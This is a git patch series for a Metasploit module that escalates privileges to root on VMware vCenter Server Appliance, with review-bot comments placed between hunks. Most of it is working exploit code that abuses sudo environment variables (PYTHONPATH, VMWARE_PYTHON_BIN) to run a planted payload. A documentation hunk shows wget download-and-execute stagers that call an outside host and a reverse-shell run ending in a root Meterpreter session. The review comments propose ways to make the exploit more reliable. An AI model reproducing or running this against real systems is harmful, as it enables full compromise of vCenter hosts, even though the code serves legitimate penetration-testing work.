@@ -70,52 +70,61 @@ def check # we want to try to make this build number Rex::Version friendly. https://rubular.com/r/BNLDjy0C862cdS # technically we only care about major release 7 and 8, however we'll try to future proof w/ \d instead return CheckCode::Safe("Unable to determine vcenter build from output: #{vbuild}") unless /(\d\.\d\.\d) build[- ](\d+)/i =~ vbuild + vbuild_version = Rex::Version.new("#{Regexp.last_match(1)}.#{Regexp.last_match(2)}") return CheckCode::Safe("Version not vulnerable: #{vbuild}") unless (vbuild_version > Rex::Version.new('8.0.0') && vbuild_version < Rex::Version.new('8.0.2.23929136')) || # 8.0 u2d - (vbuild_version > Rex::Version.new('7.0.0')&& vbuild_version < Rex::Version.new('7.0.3.24026615')) # 7.0 u3r + (vbuild_version > Rex::Version.new('7.0.0') && vbuild_version < Rex::Version.new('7.0.3.24026615')) # 7.0 u3r vprint_good("Exploitable version detected: #{vbuild_version}") @user = cmd_exec('whoami').chomp @groups = cmd_exec('groups').chomp.split(' ') if ['infraprofile', 'vpxd', 'sts', 'pod'].contains?(user) || (['operator', 'admin'] & group).any? - vprint_good("User is vulnerable") + vprint_good('User is vulnerable') else return CheckCode::Safe("User not vulnerable or not in correct group. (#{user}:#{groups})") end - CheckCode::Appears("System seems exploitable") + CheckCode::Appears('System seems exploitable') end def exploit_operator_group # for this exploit we abuse get_user_password_status.py as it does a 'import spwd', so if we # modify the PYTHONPATH and set our payload to spwd.py, we'll get arbitrary execution - vprint_status("Utilizing PYTHONPATH exploitation method for operator group.") + vprint_status('Utilizing PYTHONPATH exploitation method for operator group.') vuln_exe = '/usr/lib/applmgmt/support/scripts/get_user_password_status.py' - return Failure::NotFound, "Vulnerable script #{vuln_exe} not found" unless file?vuln_exe + return Failure::NotFound, "Vulnerable script #{vuln_exe} not found" unless file? 
vuln_exe # Upload payload executable - payload_path = "#{base_dir}/spwd.py" + payload_path = "#{base_dir}/#{rand_text_alphanumeric(6..10)}" upload_and_chmodx payload_path, generate_payload_exe register_files_for_cleanup(payload_path) + + # Upload payload stub + payload_stub = "#{base_dir}/spwd.py" + write_file(payload_stub, "import os\nos.system('#{payload_path}')\nquit()") + register_files_for_cleanup(payload_stub) + timeout = 30 print_status 'Launching exploit...' - output = cmd_exec "echo 'PYTHONPATH=#{base_dir} sudo #{vuln_exe} & exit' | #{executable_path}", nil, timeout + output = cmd_exec "sudo PYTHONPATH=#{base_dir} #{vuln_exe}", nil, timeout output.each_line { |line| vprint_status line.chomp } end def exploit_pod_user # for this exploit we abuse install-parametery as it does a 'from appliance...', so if we # modify the VMWARE_PYTHON_PATH and set our payload to __init__.py, we'll get arbitrary execution - vprint_status("Utilizing VMWARE_PYTHON_PATH exploitation method for pod user.") + vprint_status('Utilizing VMWARE_PYTHON_PATH exploitation method for pod user.') mkdir("#{base_dir}/appliance") - + + # Upload payload executable payload_path = "#{base_dir}/appliance/#{rand_text_alphanumeric(6..10)}" upload_and_chmodx payload_path, generate_payload_exe register_files_for_cleanup(payload_path) + # Upload payload stub payload_stub = "#{base_dir}/appliance/__init__.py" write_file(payload_stub, "import os\nos.system('#{payload_path}')\nquit()") register_files_for_cleanup(payload_stub) 
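Review bot: `check` still tests `['infraprofile', 'vpxd', 'sts', 'pod'].contains?(user) || (['operator', 'admin'] & group).any?`, but `Array#contains?` is not a Ruby method and `user`/`group` are not defined — the values were stored in `@user` and `@groups` two lines earlier — so this version of `check` raises NoMethodError/NameError before it can return `Appears`; it should read `if %w[infraprofile vpxd sts pod].include?(@user) || (%w[operator admin] & @groups).any?`, and the `Safe` message should interpolate `@user`/`@groups`. The documented runs were all done with `autocheck false`, which is presumably why this was not noticed. In `exploit_operator_group`, `return Failure::NotFound, "Vulnerable script #{vuln_exe} not found" unless file? vuln_exe` returns a two-element array rather than aborting the module; `fail_with(Failure::NotFound, "Vulnerable script #{vuln_exe} not found") unless file?(vuln_exe)` is the framework idiom. `exploit_operator_group` continues past the end of the hunk.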
@@ -129,14 +138,22 @@ def exploit_pod_user def exploit_admin_group # for this exploit we abuse /bin/dcli, a bash script, as it executes $VMWARE_PYTHON_BIN # so we modify the VMWARE_PYTHON_BIN, and we'll get arbitrary execution - vprint_status("Utilizing VMWARE_PYTHON_BIN exploitation method for admin group.") + vprint_status('Utilizing VMWARE_PYTHON_BIN exploitation method for admin group.') mkdir("#{base_dir}/appliance") - payload_path = "#{base_dir}/__init__.py" + + # Upload payload executable + payload_path = "#{base_dir}/appliance/#{rand_text_alphanumeric(6..10)}" upload_and_chmodx payload_path, generate_payload_exe register_files_for_cleanup(payload_path) + + # Upload payload stub + payload_stub = "#{base_dir}/appliance/__init__.py" + write_file(payload_stub, "import os\nos.system('#{payload_path}')\nquit()") + register_files_for_cleanup(payload_stub) + timeout = 30 print_status 'Launching exploit...' - output = cmd_exec "echo 'VMWARE_PYTHON_BIN=#{payload_path} sudo /bin/dcli & exit' | #{executable_path}", nil, timeout + output = cmd_exec "sudo VMWARE_PYTHON_BIN=#{payload_path} /bin/dcli", nil, timeout output.each_line { |line| vprint_status line.chomp } end @@ -145,9 +162,9 @@ def exploit @groups = cmd_exec('groups').chomp.split(' ') if @groups.nil? if @user == 'pod' exploit_pod_user - elsif @group.contains? 'operator' + elsif @groups.include? 'operator' exploit_operator_group - elsif @group.contains? 'admin' + elsif @groups.include? 'admin' exploit_admin_group end end From 0f6da56a5298974006604e8ee47338d0233ca92b Mon Sep 17 00:00:00 2001 From: h00die Date: Thu, 21 Nov 2024 04:34:15 -0500 Subject: [PATCH 6/7] vcenter sudo module --- .../exploit/linux/local/vcenter_sudo_lpe.md | 80 ++++++++++++++----- lib/msf/core/post/vcenter/vcenter.rb | 2 + .../exploits/linux/local/vcenter_sudo_lpe.rb | 17 ++-- 3 files changed, 69 insertions(+), 30 deletions(-) 
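Review bot: In exploit_admin_group the `appliance/__init__.py` stub is written and registered for cleanup, but the command that follows, `sudo VMWARE_PYTHON_BIN=#{payload_path} /bin/dcli`, points VMWARE_PYTHON_BIN straight at the uploaded executable, so the stub and the `appliance` subdirectory are never consumed on this path unless dcli also imports from that directory, which the hunk's own comment does not suggest. Dropping the stub and the `mkdir` for this method reduces the on-disk footprint to the single payload file, e.g. `payload_path = "#{base_dir}/#{rand_text_alphanumeric(6..10)}"` followed directly by the sudo call. The documentation's sample run later in this series shows only the binary being written before `__init__.py` is deleted, which is consistent with the stub being unused; worth confirming before removing it.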
diff --git a/documentation/modules/exploit/linux/local/vcenter_sudo_lpe.md b/documentation/modules/exploit/linux/local/vcenter_sudo_lpe.md index f2b660ab7023..9bf5cb480710 100644 --- a/documentation/modules/exploit/linux/local/vcenter_sudo_lpe.md +++ b/documentation/modules/exploit/linux/local/vcenter_sudo_lpe.md @@ -1,27 +1,27 @@ ## Vulnerable Application -Instructions to get the vulnerable application. If applicable, include links to the vulnerable install -files, as well as instructions on installing/configuring the environment if it is different than a -standard install. Much of this will come from the PR, and can be copy/pasted. +VMware vCenter Server < 7.0.3 update R and < 8.0.2 update D +contains multiple local privilege escalation vulnerabilities +due to misconfiguration of sudo. An authenticated local user +with non-administrative privileges may exploit these issues +to elevate privileges to root on vCenter Server Appliance. + +Tested against VMware vCenter Server Appliance 8.0.0.10000 20519528 ## Verification Steps -Example steps in this format (is also in the PR): 1. Install the application -1. Start msfconsole -1. Do: `use [module path]` -1. Do: `run` -1. You should get a shell. +2. Start msfconsole +3. Get an initial user level shell +4. Do: `use exploit/linux/local/vcenter_sudo_lpe` +5. Do: `set lhost ` +6. Do: `set sessoin ` +7. Do: `run` +8. You should get a root shell. ## Options -List each option and how to use it. - -### Option Name - -Talk about what it does, and how to use it appropriately. If the default value is likely to change, include the default value here. ## Scenarios -Specific demo of using the module that might be useful in a real world scenario. ### VMware vCenter Server Appliance 8.0.0.10000 (VMware-VCSA-all-8.0.0-20519528.iso) 
@@ -85,7 +85,7 @@ pod@localhost [ /tmp ]$ wget -qO smswhnVK --no-check-certificate http://2.2.2.2: [1] 22325 ``` -Priv Esc +Priv Esc. Autocheck disabled due to an incomplete install. ``` [msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > sessions -i 1 @@ -182,7 +182,7 @@ wget -qO JSlY5cPV --no-check-certificate http://2.2.2.2:8181/eEgibKL2K; chmod +x [*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:56166) at 2024-11-18 16:27:17 -0500 ``` -Priv Esc +Priv Esc. Autocheck disabled due to an incomplete install. ``` [msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) > use exploit/linux/local/vcenter_sudo_lpe @@ -230,9 +230,9 @@ If the user `admin` exists, use that. If not, follow the bellow instructions Make a user in the operator group: ``` -sudo useradd -m -s /bin/bash admin -sudo usermod -aG admin admin -sudo usermod -aG users admin +useradd -m -s /bin/bash admin +usermod -aG admin admin +usermod -aG users admin ``` Start our first handler 
@@ -263,7 +263,45 @@ wget -qO IsMq60f5 --no-check-certificate http://2.2.2.2:8181/Hul7qG; chmod +x Is Priv Esc ``` -``` +[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/linux/local/vcenter_sudo_lpe +[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp +[msf](Jobs:1 Agents:1) exploit(linux/local/vcenter_sudo_lpe) > set lhost 2.2.2.2 +lhost => 2.2.2.2 +[msf](Jobs:1 Agents:1) exploit(linux/local/vcenter_sudo_lpe) > set lport 9870 +lport => 9870 +[msf](Jobs:1 Agents:1) exploit(linux/local/vcenter_sudo_lpe) > set verbose true +verbose => true +[msf](Jobs:1 Agents:1) exploit(linux/local/vcenter_sudo_lpe) > set autocheck false +autocheck => false +[msf](Jobs:1 Agents:1) exploit(linux/local/vcenter_sudo_lpe) > set session 1 +session => 1 +[msf](Jobs:1 Agents:1) exploit(linux/local/vcenter_sudo_lpe) > run +[*] Started reverse TCP handler on 2.2.2.2:9870 +[*] Running automatic check ("set AutoCheck false" to disable) +[+] Exploitable version detected: 8.0.0.20519528 +[+] User is vulnerable +[+] The target appears to be vulnerable. Version 8.0.0.20519528 and user (admin:["users", "admin"]) are vulnerable +[*] Utilizing VMWARE_PYTHON_BIN exploitation method for admin group. +[*] Creating directory /tmp/appliance +[*] /tmp/appliance created +[*] Writing '/tmp/appliance/NKdii1ux' (250 bytes) ... +[*] Launching exploit... +[*] Transmitting intermediate stager...(126 bytes) +[*] Sending stage (3045380 bytes) to 1.1.1.1 +[+] Deleted /tmp/appliance/NKdii1ux +[+] Deleted /tmp/appliance/__init__.py +[+] Deleted /tmp/appliance +[*] Meterpreter session 2 opened (2.2.2.2:9870 -> 1.1.1.1:58686) at 2024-11-21 04:00:08 -0500 -XXX to be completed \ No newline at end of file +(Meterpreter 2)(/tmp) > getuid +Server username: root +(Meterpreter 2)(/tmp) > background +[*] Backgrounding session 2... +s[msf](Jobs:1 Agents:2) exploit(linux/local/vcenter_sudo_lpe) > sessions -i 1 +[*] Starting interaction with 1... 
+ +(Meterpreter 1)(/tmp) > getuid +Server username: admin +(Meterpreter 1)(/tmp) > +``` diff --git a/lib/msf/core/post/vcenter/vcenter.rb b/lib/msf/core/post/vcenter/vcenter.rb index 02c455cb5edc..c884ec4d357b 100644 --- a/lib/msf/core/post/vcenter/vcenter.rb +++ b/lib/msf/core/post/vcenter/vcenter.rb @@ -118,6 +118,7 @@ def validate_pkey(private_key) # # It returns the vcenter product banner and build number + # Cross reference https://knowledge.broadcom.com/external/article/326316/build-numbers-and-versions-of-vmware-vce.html # @return [String] of vcenter product banner and build number # def get_vcenter_build @@ -125,6 +126,7 @@ def get_vcenter_build return cmd_exec("#{vpxd_bin} -v").split("\n").last.strip end + # this file may not be getting updated any longer. On vCenter 8.0.0.10000 it reads 6.5.0.0 Build 16197320 if file_exist?(manifest_file) xml = read_file(manifest_file) xmldoc = Nokogiri::XML(xml) do |config| diff --git a/modules/exploits/linux/local/vcenter_sudo_lpe.rb b/modules/exploits/linux/local/vcenter_sudo_lpe.rb index 256557673962..329b1db14ac8 100644 --- a/modules/exploits/linux/local/vcenter_sudo_lpe.rb +++ b/modules/exploits/linux/local/vcenter_sudo_lpe.rb @@ -24,6 +24,8 @@ def initialize(info = {}) due to misconfiguration of sudo. An authenticated local user with non-administrative privileges may exploit these issues to elevate privileges to root on vCenter Server Appliance. + + Tested against VMware vCenter Server Appliance 8.0.0.10000 20519528 }, 'License' => MSF_LICENSE, 'Author' => [ 
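Review bot: The new comment above the manifest fallback in get_vcenter_build records that the manifest can report a stale `6.5.0.0 Build 16197320` on an 8.0.0 appliance, yet the code still returns that value to callers as if it were authoritative; a version gate such as the one in vcenter_sudo_lpe's check would then classify a vulnerable 8.x host as Safe, which may be why the documentation's runs in this series set AutoCheck to false. Consider making the degraded source visible to the caller, e.g. `vprint_warning('vpxd unavailable; build taken from manifest, which may be stale')` before the manifest is parsed, or returning nil when vpxd is unavailable so callers can report CheckCode::Unknown instead of Safe. The method body continues outside the hunk, so the exact return shape of the fallback is not visible here.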
@@ -44,21 +46,18 @@ def initialize(info = {}) ], 'DisclosureDate' => '2024-06-18', 'DefaultTarget' => 0, - # https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html 'Notes' => { - 'Stability' => [], - 'Reliability' => [], - 'SideEffects' => [] + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [ARTIFACTS_ON_DISK] } ) ) - # force exploit is used to bypass the check command results register_advanced_options [ OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) ] end - # Simplify pulling the writable directory variable def base_dir datastore['WritableDir'].to_s end @@ -80,13 +79,13 @@ def check @user = cmd_exec('whoami').chomp @groups = cmd_exec('groups').chomp.split(' ') - if ['infraprofile', 'vpxd', 'sts', 'pod'].contains?(user) || (['operator', 'admin'] & group).any? + if ['infraprofile', 'vpxd', 'sts', 'pod'].include?(@user) || (['operator', 'admin'] & @groups).any? vprint_good('User is vulnerable') else - return CheckCode::Safe("User not vulnerable or not in correct group. (#{user}:#{groups})") + return CheckCode::Safe("User not vulnerable or not in correct group. (#{@user}:#{@groups})") end - CheckCode::Appears('System seems exploitable') + CheckCode::Appears("Version #{vbuild_version} and user (#{@user}:#{@groups}) are vulnerable") end def exploit_operator_group From bca3626cf2585acb857b769f2070d76df9bf7c31 Mon Sep 17 00:00:00 2001 From: h00die Date: Wed, 4 Dec 2024 18:39:43 -0500 Subject: [PATCH 7/7] peer review --- .../exploits/linux/local/vcenter_sudo_lpe.rb | 23 ++++++++++++------- 1 file changed, 15 insertions(+), 8 deletions(-) diff --git a/modules/exploits/linux/local/vcenter_sudo_lpe.rb b/modules/exploits/linux/local/vcenter_sudo_lpe.rb index 329b1db14ac8..88dc67f2bd28 100644 --- a/modules/exploits/linux/local/vcenter_sudo_lpe.rb +++ b/modules/exploits/linux/local/vcenter_sudo_lpe.rb 
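Review bot: check's user test `['infraprofile', 'vpxd', 'sts', 'pod'].include?(@user) || (['operator', 'admin'] & @groups).any?` returns CheckCode::Appears for infraprofile, vpxd and sts, yet the exploit method visible elsewhere in this series only dispatches pod, operator and admin, so for those three users AutoCheck green-lights a run that has no exploitation path. Either narrow the check to what is implemented, `if @user == 'pod' || (['operator', 'admin'] & @groups).any?`, or keep the list and add a comment above it stating that the remaining sudoers entries from the advisory are recognised but not yet implemented, so the mismatch is deliberate rather than accidental. The `groups` output is also only a proxy for sudoers applicability; confirming the rule directly would make Appears a stronger claim.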
@@ -54,7 +54,8 @@ def initialize(info = {}) ) ) register_advanced_options [ - OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) + OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]), + OptInt.new('TIMEOUT', [ true, 'Command timeout', 30 ]) ] end @@ -68,7 +69,7 @@ def check # VMware vCenter Server Appliance 6.5.0.0 Build 16197320 # we want to try to make this build number Rex::Version friendly. https://rubular.com/r/BNLDjy0C862cdS # technically we only care about major release 7 and 8, however we'll try to future proof w/ \d instead - return CheckCode::Safe("Unable to determine vcenter build from output: #{vbuild}") unless /(\d\.\d\.\d) build[- ](\d+)/i =~ vbuild + return CheckCode::Safe("Unable to determine vcenter build from output: #{vbuild}") unless /(\d+\.\d+\.\d+) build[- ](\d+)/i =~ vbuild vbuild_version = Rex::Version.new("#{Regexp.last_match(1)}.#{Regexp.last_match(2)}") @@ -106,9 +107,8 @@ def exploit_operator_group write_file(payload_stub, "import os\nos.system('#{payload_path}')\nquit()") register_files_for_cleanup(payload_stub) - timeout = 30 print_status 'Launching exploit...' - output = cmd_exec "sudo PYTHONPATH=#{base_dir} #{vuln_exe}", nil, timeout + output = cmd_exec "sudo PYTHONPATH=#{base_dir} #{vuln_exe}", nil, datastore['TIMEOUT'] output.each_line { |line| vprint_status line.chomp } end @@ -128,9 +128,8 @@ def exploit_pod_user write_file(payload_stub, "import os\nos.system('#{payload_path}')\nquit()") register_files_for_cleanup(payload_stub) - timeout = 30 print_status 'Launching exploit...' - output = cmd_exec "sudo VMWARE_PYTHON_PATH=#{base_dir} install-parameter", nil, timeout + output = cmd_exec "sudo VMWARE_PYTHON_PATH=#{base_dir} install-parameter", nil, datastore['TIMEOUT'] output.each_line { |line| vprint_status line.chomp } end 
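Review bot: The stubs shown as context in the operator and pod hunks run the payload with `os.system('#{payload_path}')` in the foreground, so if the payload does not detach, the `sudo ...` command and therefore `cmd_exec` cannot return until the new TIMEOUT expires; the earlier revision in this series backgrounded the sudo call with `&`. If waiting out the timeout is the intended behaviour it should be stated on the option, otherwise `os.system('#{payload_path} >/dev/null 2>&1 &')` lets sudo return while the session is being established. Independently, `OptInt.new('TIMEOUT', [ true, 'Command timeout', 30 ])` should name the unit, e.g. `'Command timeout in seconds'`, since the value is passed straight through to cmd_exec, and the documentation's Options section left empty by the earlier commit should list both TIMEOUT and WritableDir.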
@@ -150,13 +149,19 @@ def exploit_admin_group write_file(payload_stub, "import os\nos.system('#{payload_path}')\nquit()") register_files_for_cleanup(payload_stub) - timeout = 30 print_status 'Launching exploit...' - output = cmd_exec "sudo VMWARE_PYTHON_BIN=#{payload_path} /bin/dcli", nil, timeout + output = cmd_exec "sudo VMWARE_PYTHON_BIN=#{payload_path} /bin/dcli", nil, datastore['TIMEOUT'] output.each_line { |line| vprint_status line.chomp } end def exploit + if !datastore['ForceExploit'] && is_root? + fail_with(Failure::None, 'Session already has root privileges. Set ForceExploit to override') + end + unless writable?(base_dir) + fail_with(Failure::BadConfig, "#{base_dir} is not writable") + end + @user = cmd_exec('whoami').chomp if @user.nil? @groups = cmd_exec('groups').chomp.split(' ') if @groups.nil? if @user == 'pod' @@ -165,6 +170,8 @@ def exploit exploit_operator_group elsif @groups.include? 'admin' exploit_admin_group + else + fail_with(Failure::BadConfig, "User not vulnerable or not in correct group. (#{@user}:#{@groups})") end end end
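Review bot: The new fall-through branch `fail_with(Failure::BadConfig, "User not vulnerable or not in correct group. (#{@user}:#{@groups})")` reports a property of the target rather than of the module configuration, so `Failure::NotVulnerable` is the accurate class; BadConfig steers users toward changing options that cannot alter the outcome. The sudo invocation in this hunk, `sudo VMWARE_PYTHON_BIN=#{payload_path} /bin/dcli`, like the operator and pod variants, runs without `-n`, so on a host whose sudoers entry still requires a password the command blocks on a prompt until TIMEOUT with no diagnostic; `sudo -n VMWARE_PYTHON_BIN=#{payload_path} /bin/dcli` fails fast with sudo's own error instead. A `sudo -n -l` probe in check would likewise confirm the misconfiguration rather than inferring it from username and build. exploit_admin_group starts before this hunk.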